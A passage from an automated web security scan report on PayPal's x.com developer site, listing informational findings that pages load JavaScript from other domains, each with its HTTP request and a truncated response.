Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333631393b3130322c313631333b3130322c333831323b3130322c333834313b3130322c313035313b3130322c313033313b3130322c333638383b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:50 GMT; Path=/
Vary: User-Agent
JP: D=123460 t=1313157230328400
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.156. https://www.x.com/docs/DOC-3688

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3688

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3688 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333638383b3130322c333831323b3130322c333834313b3130322c313631333b3130322c313033313b3130322c313035313b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=147682 t=1313157229798103
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.157. https://www.x.com/docs/DOC-3811

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3811

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3811 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:39:54 GMT; Path=/
Vary: User-Agent
JP: D=104592 t=1313156394128506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.158. https://www.x.com/docs/DOC-3811/delete

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3811/delete

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3811/delete HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=98952 t=1313157245116745
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.159. https://www.x.com/docs/DOC-3811/restore

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3811/restore

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3811/restore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Fri, 12 Aug 2011 13:54:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=74141 t=1313157244704571
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.160. https://www.x.com/docs/DOC-3812

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3812

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3812 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333831323b3130322c313033313b3130322c313631333b3130322c313035313b3130322c313337323b3130322c333834313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=97831 t=1313157229433265
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.161. https://www.x.com/docs/DOC-3836

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3836

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3836 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333833363b3130322c323234313b3130322c333230313b3130322c313535313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b3130322c333335323b3130322c333335333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:05 GMT; Path=/
Vary: User-Agent
JP: D=194903 t=1313157245590892
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.162. https://www.x.com/docs/DOC-3841

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3841

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3841 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333834313b3130322c333831323b3130322c313033313b3130322c313337323b3130322c313035313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=198718 t=1313157228930468
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.163. https://www.x.com/docs/emailPasswordToken!input.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/emailPasswordToken!input.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/emailPasswordToken!input.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=14987 t=1313157244126484
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.164. https://www.x.com/emailPasswordToken!input.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /emailPasswordToken!input.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /emailPasswordToken!input.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=47387 t=1313157093849782
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.165. https://www.x.com/groups/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /groups/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /groups/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=48364 t=1313157104111484
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.166. https://www.x.com/ideas/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /ideas/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ideas/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: User-Agent
JP: D=66606589 t=1313157225229043
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.167. https://www.x.com/index.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /index.jspa

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.jspa HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
JP: D=81298 t=1313114364510678
Cache-Control: no-cache, private
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 33122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.168. https://www.x.com/main-apps.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /main-apps.jspa

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /main-apps.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 403 Forbidden
Date: Fri, 12 Aug 2011 13:52:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=35573 t=1313157173580554
Cache-Control: no-cache, private
Connection: close
X-Pad: avoid browser bug

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.169. https://www.x.com/message/186684

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/186684

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/186684 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34363935333b312c35333838343b312c34393435343b312c35343036353b312c35333937373b312c34373636333b312c35343035383b312c35333135383b312c35333137323b312c35333235323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:40 GMT; Path=/
Vary: User-Agent
JP: D=137098 t=1313157519959178
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.170. https://www.x.com/message/198017

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/198017

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/198017 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:39 GMT; Path=/
Vary: User-Agent
JP: D=113649 t=1313157519428788
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.171. https://www.x.com/message/211333

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211333

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/211333 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:36 GMT; Path=/
Vary: User-Agent
JP: D=58458 t=1313157516498640
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.172. https://www.x.com/message/211439

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211439

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/211439 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:36 GMT; Path=/
Vary: User-Agent
JP: D=102902 t=1313157516178631
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.173. https://www.x.com/message/211738

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211738

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/211738 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=105262 t=1313157515804148
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.174. https://www.x.com/message/212001

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212001

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/212001 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=105378 t=1313157515407297
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
